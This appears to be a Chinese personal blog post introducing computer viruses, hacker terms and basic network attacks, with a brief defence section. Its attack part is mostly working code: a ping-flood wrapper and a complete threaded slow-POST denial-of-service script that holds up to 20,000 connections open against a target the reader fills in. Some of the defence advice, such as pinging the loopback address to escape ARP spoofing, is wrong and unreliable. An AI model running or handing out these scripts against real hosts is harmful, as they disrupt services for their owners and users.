

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#3cbdfe">
  <meta name="description" content="妙啊">
  <meta name="author" content="CAIWEI">
  <meta name="keywords" content="">
  <meta name="description" content="妙啊">
<meta property="og:type" content="article">
<meta property="og:title" content="信息安全攻防基础">
<meta property="og:url" content="http://example.com/2020/04/26/ji_suan_ji_bing_du_gong_fang_ji_chu/index.html">
<meta property="og:site_name" content="CAIWEI的博客">
<meta property="og:description" content="妙啊">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/154/154-bigskin-7.jpg">
<meta property="article:published_time" content="2020-04-26T03:34:45.000Z">
<meta property="article:modified_time" content="2021-11-24T08:39:21.764Z">
<meta property="article:author" content="CAIWEI">
<meta property="article:tag" content="信息安全">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/154/154-bigskin-7.jpg">
  
  <title>信息安全攻防基础 - CAIWEI的博客</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="CAIWEI的博客" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong> </strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/0.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="信息安全攻防基础">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-04-26 11:34" pubdate>
        2020年4月26日 中午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.7k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      12 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">信息安全攻防基础</h1>
            
            <div class="markdown-body">
              <p>妙啊</p>
<a id="more"></a>
<h1 id="序言">序言</h1>
<p>先明确本篇文章旨在让有意学习者了解计算机病毒入侵的手段和防护办法，请各位学习者自觉遵循中华人民共和国相关法律法规。 其次，如果认为“黑客是坏蛋"，建议先看看<a href="https://m.baidu.com/sf_bk/item/%E9%BB%91%E5%AE%A2/118396?ms=1&amp;rid=11053482354809685763" target="_blank" rel="noopener">黑客骇客谁是坏蛋？</a></p>
<p>其实关于入侵技术的文章一直都是比较少，可能是因为现在国家企业对网络安全越来越重视了，越来越多的技术人员从事网络安全防护，病毒入侵也不似以前那么猖狂。</p>
<h1 id="计算机病毒介绍">计算机病毒介绍</h1>
<h2 id="概念">概念</h2>
<p>狭义上的计算机病毒是指能够进行自我传播，需要用户敢于来触发执行的破坏性程序或代码。</p>
<h2 id="计算机病毒分类">计算机病毒分类</h2>
<ul>
<li><p>按照计算机病毒攻击的系统分类：<br>
（1）攻击Windows系统的病毒<br>
（2）攻击DOS系统的病毒<br>
（3）攻击UNIX系统的病毒<br>
（4）攻击Operating System/2系统的病毒</p></li>
<li><p>按照计算机病毒的链结方式分类<br>
（1）源码型病毒<br>
（2）嵌入型病毒<br>
（3）外壳型病毒<br>
（4）操作系统型病毒</p></li>
<li><p>按照计算机病毒的破坏情况分类<br>
（1）良性计算机病毒<br>
（2）恶性计算机病毒<br>
（3）引导型计算机病毒</p></li>
<li><p>按照计算机病毒的传播媒介分类<br>
（1）单机病毒<br>
（2）网络病毒</p></li>
</ul>
<h2 id="黑客术语">黑客术语</h2>
<p>蠕虫：一段能进行自我传播，无须用户干预而可以自动触发执行额破坏性程序或代码。</p>
<p>木马：是指附着在应用程序上或单独存在的一些恶意程序，他可以利用网络远程响应网络的另一端的控制程序的控制命令，实现对被植入木马的目标计算机的控制或者窃取感染木马程序 的计算机上的机密资料。</p>
<p>后门：允许攻击者绕过系统中常规安全控制机制的程序，它按照攻击者自己的意图提供通道。</p>
<p>僵尸（bot）：是指实现恶意控制功能的程序代码。大量被植入僵尸程序的电脑通过僵尸控制服务器便可以形成僵尸网络。</p>
<p>rootkit：室友很多有用的小程序组成的工具包，使得攻击者能够保持访问计算机上具有最高权限的用户“root”。 换言之 ，rootkit是可以持久的，无法被检测地存在于计算机的一组程序或代码。</p>
<p>间谍软件：以主动收集用户个人信息，相关机密文件或隐私数据为主，收集到的数据会主动传送到指定服务器 。</p>
<p>流氓软件：具有一定的实用价值但具备电脑病毒和黑客软件的部分特征的软件</p>
<p>exploit：精心设计的用于利用特定漏洞以及对目标系统进行控制的程序</p>
<p>提权：操作系统低权限的账户将自己提升为管理员权限使用的方法。</p>
<p>后门：黑客为了对主机进行长期的控制，在机器上种植的一段程序或留下的一个“入口”。</p>
<p>跳板：使用肉鸡IP来实施攻击的其他目标，以便更好的隐蔽自己的身份信息。</p>
<p>旁站入侵：即同服务器下的网站入侵，入侵之后可以通过提权跨目录手段拿到目标网站的权限。(常见的工具有：WebRobot、御剑、明小子和web在线查询等) 。</p>
<p><a href="https://blog.csdn.net/qq_40769535/article/details/89574422" target="_blank" rel="noopener">更多黑客术语查看</a></p>
<h1 id="搭建环境">搭建环境</h1>
<ul>
<li><p>首先，安装Python 相信这一步大家都轻车熟路的啦，在这里略过……<br>
（PS：以下演示环境为Python3.7）<br>
<a href="https://mp.weixin.qq.com/s?__biz=MzIwMjE1MjMyMw==&amp;mid=2650202449&amp;idx=4&amp;sn=461cd7441267ada4d4c5662d74ca4494&amp;chksm=8ee141bdb996c8ab0b586bfb64e97855d14f597ac9d27035fee52d32a24f7560bbce3cbef0a2&amp;scene=21#wechat_redirect" target="_blank" rel="noopener">安装Python3.7</a></p></li>
<li><p>安装虚拟机并安装Windows系统镜像 攻击别人的电脑或网站犯法，所以自己搭建个虚拟机吧（说机不说吧，文明你我他）òᆺó<br>
<a href="https://mp.weixin.qq.com/s?__biz=MzIwMjE1MjMyMw==&amp;mid=2650203072&amp;idx=1&amp;sn=b21a1c1d4526cb578efa7aeb74f4d857&amp;chksm=8ee1432cb996ca3ae786c341458b2d52d9af516134975a43180d904e36c14253596f28be7996&amp;scene=21#wechat_redirect" target="_blank" rel="noopener">安装VMware</a><br>
<a href="https://blog.csdn.net/qq3399013670/article/details/81937412" target="_blank" rel="noopener">安装VitrualBox</a><br>
以上安装虚拟机方式任选其一，安装完成记得下载iso文件安装系统</p></li>
</ul>
<h2 id="ping网络堵塞">ping网络堵塞</h2>
首先，需要获取攻击的ip地址（这个是最基本的，连没有ip地址都不知道，就啥也搞不了）。<br>
Windows系统获得本机的ip地址只需要打开命令提示符（cmd）并输入ipconfig就可以了。但是攻击的时候需要目标的ip地址，这个时候就需要抓包工具啦。<br>
<a href="https://blog.csdn.net/gufenchen/article/details/90895856" target="_blank" rel="noopener">常用的几款抓包工具</a> ，找一个你觉得顺眼的工具用一下吧！（这里说一下，黑客的软件，不能随便下载，指不准在软件里做了手脚打包发出来的，所以尽量还是去可靠的渠道下载黑客工具吧，例如官网~）<br>
如果是获取网站ip地址，直接打开cmd，ping一下域名就行了。<br>
<code>ping baidu.com</code><br>

<center>
如图，得到的 就是ip地址
</center>
<p>在这里来个补充，ping一下ip，原理上是本机给对方ip地址发送请求，如果对方ip收到请求那么就给本机返回数据包~在这过程中对方ip地址对应的服务器（电脑）</p>
<p>试想，如果一直发送会不会造成网络堵塞？<br>
因此有了以下操作：</p>
<p>PING -t ip 注：这样可以PING指定的IP到永远，除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。 PING -l 大小 ip<br>
注：这样可以设置发送包大小<br>
PING -n 次数 ip<br>
注：这样可以设置次数。</p>
<p><code>PING -n 10 -l 10 baidu.com</code></p>
<p>图</p>
<p>利用ping造成网络堵塞的Python3.7代码 </p><figure class="highlight python"><table><tbody><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br>ip = input(<span class="hljs-string">"请输入IP："</span>)<br>os.system(<span class="hljs-string">"ping -t -l 50 "</span> + ip)<br></code></pre></div></td></tr></tbody></table></figure><p></p>
<h2 id="分布式拒绝服务攻击ddos">分布式拒绝服务攻击（DDos）</h2>
<p>分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击，是一种网络攻击手法，其目的在于使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。</p>
<p>来看看Python3.7的DDos代码 </p><figure class="highlight python"><table><tbody><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> threading<br><span class="hljs-comment">#Pressure Test,ddos tool</span><br><br><span class="hljs-comment">#---------------------------</span><br>MAX_CONN=<span class="hljs-number">20000</span><br>PORT=<span class="hljs-number">80</span><br>HOST=<span class="hljs-string">""</span><span class="hljs-comment">#在双引号里输入对方IP或域名，要保证他联网了或开机了.</span><br>PAGE=<span class="hljs-string">"/index.php"</span><br><span class="hljs-comment">#---------------------------</span><br><br>buf=(<span class="hljs-string">"POST %s HTTP/1.1\r\n"</span><br><span class="hljs-string">"Host: %s\r\n"</span><br><span class="hljs-string">"Content-Length: 10000000\r\n"</span><br><span class="hljs-string">"Cookie: dklkt_dos_test\r\n"</span><br><span class="hljs-string">"\r\n"</span> % (PAGE,HOST))<br><br>socks=[]<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">conn_thread</span><span class="hljs-params">()</span>:</span><br>    <span class="hljs-keyword">global</span> socks<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0</span>,MAX_CONN):<br>        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>        <span class="hljs-keyword">try</span>:<br>            s.connect((HOST,PORT))<br>            s.send(buf.encode())<br>            <span class="hljs-keyword">print</span> (<span class="hljs-string">"Send buf OK!,conn=%d\n"</span>%i)<br>            socks.append(s)<br>        <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> ex:<br>            <span class="hljs-keyword">print</span> (<span class="hljs-string">"Could not connect to server or send error:%s"</span>%ex)<br>            time.sleep(<span class="hljs-number">0.1</span>)<br><span class="hljs-comment">#end def</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">send_thread</span><span class="hljs-params">()</span>:</span><br>    <span class="hljs-keyword">global</span> socks<br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        <span class="hljs-keyword">for</span> s <span class="hljs-keyword">in</span> socks:<br>            <span class="hljs-keyword">try</span>:<br>                s.send(<span class="hljs-string">"f"</span>.encode())<br>                <span class="hljs-comment">#print "send OK!"</span><br>            <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> ex:<br>                <span class="hljs-keyword">print</span> (<span class="hljs-string">"Send Exception:%s\n"</span>%ex)<br>                socks.remove(s)<br>                s.close()<br>        time.sleep(<span class="hljs-number">0.1</span>)<br><span class="hljs-comment">#end def</span><br><br>conn_th=threading.Thread(target=conn_thread,args=())<br>send_th=threading.Thread(target=send_thread,args=())<br><br>conn_th.start()<br>send_th.start()<br></code></pre></div></td></tr></tbody></table></figure><p></p>
<h1 id="防护">防护</h1>
<h2 id="预防">预防</h2>
<p>最简单最基础的网络攻击讲完了，那么接下来该学学学习如何保护自己的计算机啦(*σ´∀`)σ</p>
<ul>
<li><p>如果是Win10，打开自带的Defender<br>
傻瓜式设置，按照系统的提示把防火墙什么的都打开</p></li>
<li><p>无特殊情况不装360安全卫士，并且卸载360的所有软件</p></li>
<li><p>尽量不要安装破解软件</p></li>
<li><p>看到明显的恶意捆绑软件不要安装，以及defender提示病毒的软件也尽量不要安装。</p></li>
<li><p>不进不明不网站，不收奇怪邮件。下载完压缩包文件后先进行病毒扫描</p></li>
<li><p>关闭不必要的端口</p></li>
</ul>
<h2 id="如何应对攻击">如何应对攻击</h2>
<p>接下来，我们来看看如何应对攻击</p>
<p><strong>应对DDoS攻击</strong>： 其实目前对上DDoS攻击都是个很烦事情。<br>
要想完全不受DDos攻击的危害——断网。<br>
打开cmd窗口，输入net stop Service,关闭Windows网络服务。 关闭后，即可免遭危害。（滑稽）</p>
<p><strong>应对DNS欺骗</strong>： 重启网络路由，将浏览器全部还原为原设置。</p>
<p><strong>应对ARP欺骗</strong>： 重启网络路由，将浏览器（需要网络的软件）全部还原为默认设置。接着打开cmd窗口，输入arp -a，如果显示：没有ARP缓存表，说明你还在遭遇此攻击，否则你就已脱离了危险。接着，输入ping -t -l 10 127.0.0.1 ,不停地PING轮回IP，使其防止网络堵塞，还可能会摆脱危险。接着，打开资源监视器，找到网络，看看是谁在不断给你发送ARP数据包。找到后，立即找专业人员进行询问和修理，并且将此IP提交给专业人员。</p>
<h1 id="参考资料">参考资料</h1>
<p><a href="https://blog.csdn.net/tiantian520ttjs/article/details/103107836" target="_blank" rel="noopener">[1] Python3.7黑帽编程——病毒篇（基础篇）：tiantian520_tt</a><br>
<a href="http://m.elecfans.com/article/838613.html" target="_blank" rel="noopener">[2] 计算机病毒类型：发烧友学院</a><br>
<a href="https://blog.csdn.net/weixin_38635069/article/details/80557636" target="_blank" rel="noopener">[3]各类计算机病毒介绍：薛定谔的小橙子</a><br>
<a href="https://www.cnblogs.com/yyhh/p/5140852.html" target="_blank" rel="noopener">[4] Fiddler抓包工具总结：代码改变世界</a><br>
<a href="https://blog.csdn.net/gufenchen/article/details/90895856" target="_blank" rel="noopener">[5]常用的几款抓包工具：白清羽</a><br>
<a href="https://blog.csdn.net/qq_41658919/article/details/82501760" target="_blank" rel="noopener">[6] 黑客的基础知识：残念(￣▽￣)／王司徒</a><br>
<a href="https://blog.csdn.net/tiantian520ttjs/article/details/103435385" target="_blank" rel="noopener">[7]计算机网络安全——保护自己的计算机（基础）</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/04/26/hadoop_da_shu_ju_sheng_tai_an_zhuang/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Hadoop大数据生态安装</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/04/26/da_shu_ju_de_gai_nian_ji_ying_yong/">
                        <span class="hidden-mobile">大数据的概念及应用</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     
  </div>
  

  

  



  
    <script src='https://unpkg.com/mermaid@7.1.2/dist/mermaid.min.js'></script>
    <script>
      if (window.mermaid) {
        mermaid.initialize({theme: 'forest'});
      }
    </script>
  


</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>





  

  
    <!-- MathJax -->
    <script>
      MathJax = {
        tex: {
          inlineMath: [['$', '$'], ['\\(', '\\)']]
        },
        loader: {
          load: ['ui/lazy']
        },
        options: {
          renderActions: {
            findScript: [10, doc => {
              document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
                const display = !!node.type.match(/; *mode=display/);
                const mathjax = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
                const text = document.createTextNode('');
                node.parentNode.replaceChild(text, node);
                math.start = { node: text, delim: '', n: 0 };
                math.end = { node: text, delim: '', n: 0 };
                doc.math.push(math);
              });
            }, '', false],
            insertedScript: [200, () => {
              document.querySelectorAll('mjx-container').forEach(node => {
                let target = node.parentNode;
                if (target.nodeName.toLowerCase() === 'li') {
                  target.parentNode.classList.add('has-jax');
                }
              });
            }, '', false]
          }
        }
      };
    </script>

    <script async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-svg.js" ></script>

  











<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
